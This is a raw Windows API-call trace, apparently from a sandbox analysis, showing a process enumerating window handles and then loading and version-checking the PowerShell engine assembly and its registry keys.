	[0375.153] GetWindowThreadProcessId (in: hWnd=0x104be, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xe6c
	[0375.153] GetWindowThreadProcessId (in: hWnd=0x104ae, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x6e8
	[0375.153] GetWindowThreadProcessId (in: hWnd=0x10490, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xc6c
	[0375.153] GetWindowThreadProcessId (in: hWnd=0x10480, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xf94
	[0375.153] GetWindowThreadProcessId (in: hWnd=0x10470, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xffc
	[0375.153] GetWindowThreadProcessId (in: hWnd=0x10460, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xf74
	[0375.153] GetWindowThreadProcessId (in: hWnd=0x1044e, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xf08
	[0375.153] GetWindowThreadProcessId (in: hWnd=0x10442, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xf0c
	[0375.153] GetWindowThreadProcessId (in: hWnd=0x1043a, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xed8
	[0375.153] GetWindowThreadProcessId (in: hWnd=0x10436, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xe90
	[0375.154] GetWindowThreadProcessId (in: hWnd=0x10432, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xea8
	[0375.154] GetWindowThreadProcessId (in: hWnd=0x10416, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xfa8
	[0375.154] GetWindowThreadProcessId (in: hWnd=0x10412, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xfbc
	[0375.154] GetWindowThreadProcessId (in: hWnd=0x1040e, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xfb8
	[0375.154] GetWindowThreadProcessId (in: hWnd=0x1040a, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xfb4
	[0375.154] GetWindowThreadProcessId (in: hWnd=0x10406, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xfb0
	[0375.154] GetWindowThreadProcessId (in: hWnd=0x10402, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xfac
	[0375.154] GetWindowThreadProcessId (in: hWnd=0x103fe, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xfc0
	[0375.154] GetWindowThreadProcessId (in: hWnd=0x103f0, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xfd0
	[0375.154] GetWindowThreadProcessId (in: hWnd=0x1039a, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xf88
	[0375.155] GetWindowThreadProcessId (in: hWnd=0x1038a, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xf84
	[0375.155] GetWindowThreadProcessId (in: hWnd=0x10382, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xf80
	[0375.155] GetWindowThreadProcessId (in: hWnd=0x1036e, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xde0
	[0375.155] GetWindowThreadProcessId (in: hWnd=0x1036a, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xddc
	[0375.155] GetWindowThreadProcessId (in: hWnd=0x10366, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xdd8
	[0375.155] GetWindowThreadProcessId (in: hWnd=0x10360, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xd34
	[0375.155] GetWindowThreadProcessId (in: hWnd=0x10358, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xd10
	[0375.155] GetWindowThreadProcessId (in: hWnd=0x20276, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xd0c
	[0375.155] GetWindowThreadProcessId (in: hWnd=0x800a4, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xc9c
	[0375.155] GetWindowThreadProcessId (in: hWnd=0x10346, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xc74
	[0375.156] GetWindowThreadProcessId (in: hWnd=0x1032c, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xc1c
	[0375.156] GetWindowThreadProcessId (in: hWnd=0x10318, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xc08
	[0375.156] GetWindowThreadProcessId (in: hWnd=0x102fa, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xabc
	[0375.156] GetWindowThreadProcessId (in: hWnd=0x102e0, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x24c
	[0375.156] GetWindowThreadProcessId (in: hWnd=0x102dc, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xbb0
	[0375.156] GetWindowThreadProcessId (in: hWnd=0x102d2, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xbfc
	[0375.156] GetWindowThreadProcessId (in: hWnd=0x102ce, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xb10
	[0375.156] GetWindowThreadProcessId (in: hWnd=0x102ca, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x374
	[0375.156] GetWindowThreadProcessId (in: hWnd=0x102c6, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x368
	[0375.156] GetWindowThreadProcessId (in: hWnd=0x102c2, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xb28
	[0375.156] GetWindowThreadProcessId (in: hWnd=0x102be, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xae8
	[0375.157] GetWindowThreadProcessId (in: hWnd=0x102b2, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xb14
	[0375.157] GetWindowThreadProcessId (in: hWnd=0x102ae, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x95c
	[0375.157] GetWindowThreadProcessId (in: hWnd=0x102aa, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xa8c
	[0375.157] GetWindowThreadProcessId (in: hWnd=0x202a0, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x46c
	[0375.157] GetWindowThreadProcessId (in: hWnd=0x10264, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xb3c
	[0375.157] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xa90
	[0375.157] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xad0
	[0375.157] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xa9c
	[0375.157] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xaa0
	[0375.157] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xb1c
	[0375.157] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x7e0
	[0375.158] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xa74
	[0375.158] GetWindowThreadProcessId (in: hWnd=0x20208, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x694
	[0375.158] GetWindowThreadProcessId (in: hWnd=0x401f0, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xa28
	[0375.158] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x9b0
	[0375.158] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x8d8
	[0375.158] GetWindowThreadProcessId (in: hWnd=0x201ca, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x940
	[0375.158] GetWindowThreadProcessId (in: hWnd=0x201d8, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x93c
	[0375.158] GetWindowThreadProcessId (in: hWnd=0x301e2, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x4ec
	[0375.158] GetWindowThreadProcessId (in: hWnd=0x201de, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x150
	[0375.158] GetWindowThreadProcessId (in: hWnd=0x201c8, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x720
	[0375.158] GetWindowThreadProcessId (in: hWnd=0x301f4, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x3c4
	[0375.159] GetWindowThreadProcessId (in: hWnd=0x301c0, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x7d4
	[0375.159] GetWindowThreadProcessId (in: hWnd=0x301c4, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x6c8
	[0375.159] GetWindowThreadProcessId (in: hWnd=0x4011e, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xb54
	[0375.159] GetWindowThreadProcessId (in: hWnd=0x50122, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xb54
	[0375.159] GetWindowThreadProcessId (in: hWnd=0x501b8, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xb5c
	[0375.159] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x838
	[0375.159] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x818
	[0375.159] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x5b8
	[0375.159] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x494
	[0375.159] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x1ec
	[0375.159] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x440
	[0375.160] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x7e8
	[0375.160] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x730
	[0375.160] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x2c8
	[0375.160] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x31c
	[0375.160] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x330
	[0375.160] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x128
	[0375.160] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x5c8
	[0375.160] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x6f8
	[0375.160] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x358
	[0375.160] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x73c
	[0375.161] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0xb0
	[0375.161] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x250
	[0375.161] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x240
	[0375.161] GetWindowThreadProcessId (in: hWnd=0x20160, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x790
	[0375.161] GetWindowThreadProcessId (in: hWnd=0x70110, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x61c
	[0375.161] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x568
	[0375.161] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x538
	[0375.161] GetWindowThreadProcessId (in: hWnd=0x10128, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x540
	[0375.161] GetWindowThreadProcessId (in: hWnd=0x20104, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x460
	[0375.161] GetWindowThreadProcessId (in: hWnd=0x2002a, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x79c
	[0375.161] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x4e0
	[0375.162] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x460
	[0375.162] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x28de00 | out: lpdwProcessId=0x28de00) returned 0x778
	[0375.165] WerSetFlags () returned 0x0
	[0375.692] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0375.692] CoTaskMemFree (pv=0x0) 
	[0375.693] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x28e168, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x28e160 | out: pulNumLanguages=0x28e168, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x28e160) returned 1
	[0375.693] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x28e168, pwszLanguagesBuffer=0x2c818b0, pcchLanguagesBuffer=0x28e160 | out: pulNumLanguages=0x28e168, pwszLanguagesBuffer=0x2c818b0, pcchLanguagesBuffer=0x28e160) returned 1
	[0375.699] CoTaskMemAlloc (cb=0x24) returned 0x178b70
	[0375.699] GetUserDefaultLocaleName (in: lpLocaleName=0x178b70, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0375.699] CoTaskMemFree (pv=0x178b70) 
	[0375.723] CoTaskMemAlloc (cb=0x104) returned 0x110520
	[0375.723] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x110520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0375.723] CoTaskMemFree (pv=0x110520) 
	[0375.725] CoTaskMemAlloc (cb=0x104) returned 0x110520
	[0375.726] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x110520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0375.726] CoTaskMemFree (pv=0x110520) 
	[0375.728] CoTaskMemAlloc (cb=0x104) returned 0x110520
	[0375.728] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x110520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0375.728] CoTaskMemFree (pv=0x110520) 
	[0376.285] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28db30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0376.285] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28dbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0376.285] SetErrorMode (uMode=0x1) returned 0x1
	[0376.285] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x28dde0 | out: lpFileInformation=0x28dde0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0376.286] SetErrorMode (uMode=0x1) returned 0x1
	[0376.286] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x28e050 | out: lpdwHandle=0x28e050) returned 0x94c
	[0376.287] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2c85140 | out: lpData=0x2c85140) returned 1
	[0376.287] VerQueryValueW (in: pBlock=0x2c85140, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x28dfc8, puLen=0x28dfc0 | out: lplpBuffer=0x28dfc8*=0x2c851dc, puLen=0x28dfc0) returned 1
	[0376.288] VerQueryValueW (in: pBlock=0x2c85140, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x28df38, puLen=0x28df30 | out: lplpBuffer=0x28df38*=0x2c852b8, puLen=0x28df30) returned 1
	[0376.288] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0376.288] CoTaskMemAlloc (cb=0x2e) returned 0x172750
	[0376.288] lstrcpyW (in: lpString1=0x172750, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0376.288] CoTaskMemFree (pv=0x172750) 
	[0376.288] VerQueryValueW (in: pBlock=0x2c85140, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x28df38, puLen=0x28df30 | out: lplpBuffer=0x28df38*=0x2c8530c, puLen=0x28df30) returned 1
	[0376.288] lstrlenW (lpString="System.Management.Automation") returned 28
	[0376.288] CoTaskMemAlloc (cb=0x3c) returned 0x17bb20
	[0376.288] lstrcpyW (in: lpString1=0x17bb20, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0376.288] CoTaskMemFree (pv=0x17bb20) 
	[0376.288] VerQueryValueW (in: pBlock=0x2c85140, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x28df38, puLen=0x28df30 | out: lplpBuffer=0x28df38*=0x2c85368, puLen=0x28df30) returned 1
	[0376.288] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0376.288] CoTaskMemAlloc (cb=0x20) returned 0x178bd0
	[0376.288] lstrcpyW (in: lpString1=0x178bd0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0376.288] CoTaskMemFree (pv=0x178bd0) 
	[0376.288] VerQueryValueW (in: pBlock=0x2c85140, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x28df38, puLen=0x28df30 | out: lplpBuffer=0x28df38*=0x2c853a8, puLen=0x28df30) returned 1
	[0376.288] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0376.288] CoTaskMemAlloc (cb=0x44) returned 0x17bb20
	[0376.288] lstrcpyW (in: lpString1=0x17bb20, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0376.288] CoTaskMemFree (pv=0x17bb20) 
	[0376.288] VerQueryValueW (in: pBlock=0x2c85140, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x28df38, puLen=0x28df30 | out: lplpBuffer=0x28df38*=0x2c85410, puLen=0x28df30) returned 1
	[0376.288] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0376.288] CoTaskMemAlloc (cb=0x76) returned 0x125530
	[0376.288] lstrcpyW (in: lpString1=0x125530, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0376.288] CoTaskMemFree (pv=0x125530) 
	[0376.288] VerQueryValueW (in: pBlock=0x2c85140, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x28df38, puLen=0x28df30 | out: lplpBuffer=0x28df38*=0x2c854ac, puLen=0x28df30) returned 1
	[0376.288] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0376.288] CoTaskMemAlloc (cb=0x44) returned 0x17bb20
	[0376.289] lstrcpyW (in: lpString1=0x17bb20, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0376.289] CoTaskMemFree (pv=0x17bb20) 
	[0376.289] VerQueryValueW (in: pBlock=0x2c85140, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x28df38, puLen=0x28df30 | out: lplpBuffer=0x28df38*=0x2c85510, puLen=0x28df30) returned 1
	[0376.289] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0376.289] CoTaskMemAlloc (cb=0x58) returned 0xd53d0
	[0376.289] lstrcpyW (in: lpString1=0xd53d0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0376.289] CoTaskMemFree (pv=0xd53d0) 
	[0376.289] VerQueryValueW (in: pBlock=0x2c85140, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x28df38, puLen=0x28df30 | out: lplpBuffer=0x28df38*=0x2c8558c, puLen=0x28df30) returned 1
	[0376.289] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0376.289] CoTaskMemAlloc (cb=0x20) returned 0x178bd0
	[0376.289] lstrcpyW (in: lpString1=0x178bd0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0376.289] CoTaskMemFree (pv=0x178bd0) 
	[0376.289] VerQueryValueW (in: pBlock=0x2c85140, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x28df38, puLen=0x28df30 | out: lplpBuffer=0x28df38*=0x2c85234, puLen=0x28df30) returned 1
	[0376.289] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0376.289] CoTaskMemAlloc (cb=0x66) returned 0x176ca0
	[0376.289] lstrcpyW (in: lpString1=0x176ca0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0376.289] CoTaskMemFree (pv=0x176ca0) 
	[0376.289] VerQueryValueW (in: pBlock=0x2c85140, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x28df38, puLen=0x28df30 | out: lplpBuffer=0x28df38*=0x0, puLen=0x28df30) returned 0
	[0376.289] VerQueryValueW (in: pBlock=0x2c85140, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x28df38, puLen=0x28df30 | out: lplpBuffer=0x28df38*=0x0, puLen=0x28df30) returned 0
	[0376.289] VerQueryValueW (in: pBlock=0x2c85140, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x28df38, puLen=0x28df30 | out: lplpBuffer=0x28df38*=0x0, puLen=0x28df30) returned 0
	[0376.289] VerQueryValueW (in: pBlock=0x2c85140, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x28df08, puLen=0x28df00 | out: lplpBuffer=0x28df08*=0x2c851dc, puLen=0x28df00) returned 1
	[0376.289] CoTaskMemAlloc (cb=0x204) returned 0x12b510
	[0376.289] VerLanguageNameW (in: wLang=0x0, szLang=0x12b510, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0376.289] CoTaskMemFree (pv=0x12b510) 
	[0376.289] VerQueryValueW (in: pBlock=0x2c85140, lpSubBlock="\\", lplpBuffer=0x28df58, puLen=0x28df50 | out: lplpBuffer=0x28df58*=0x2c85168, puLen=0x28df50) returned 1
	[0376.299] CoTaskMemAlloc (cb=0x104) returned 0x110520
	[0376.299] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x110520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0376.299] CoTaskMemFree (pv=0x110520) 
	[0376.304] CoTaskMemAlloc (cb=0x104) returned 0x110520
	[0376.304] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x110520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0376.304] CoTaskMemFree (pv=0x110520) 
	[0376.309] lstrlenW (lpString="䅁") returned 1
	[0376.319] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28de28 | out: phkResult=0x28de28*=0x304) returned 0x0
	[0376.321] RegOpenKeyExW (in: hKey=0x304, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x28de18 | out: phkResult=0x28de18*=0x308) returned 0x0
	[0376.321] RegOpenKeyExW (in: hKey=0x308, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x28dea8 | out: phkResult=0x28dea8*=0x30c) returned 0x0
	[0376.819] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28ddec, lpData=0x0, lpcbData=0x28dde8*=0x0 | out: lpType=0x28ddec*=0x1, lpData=0x0, lpcbData=0x28dde8*=0x56) returned 0x0
	[0376.819] CoTaskMemAlloc (cb=0x5a) returned 0x176c30
	[0376.819] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x28ddbc, lpData=0x176c30, lpcbData=0x28ddb8*=0x56 | out: lpType=0x28ddbc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x28ddb8*=0x56) returned 0x0
	[0376.820] CoTaskMemFree (pv=0x176c30) 
	[0376.825] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0376.828] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0376.836] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0377.212] CoTaskMemAlloc (cb=0x104) returned 0x110520
	[0377.212] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x110520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0377.212] CoTaskMemFree (pv=0x110520) 
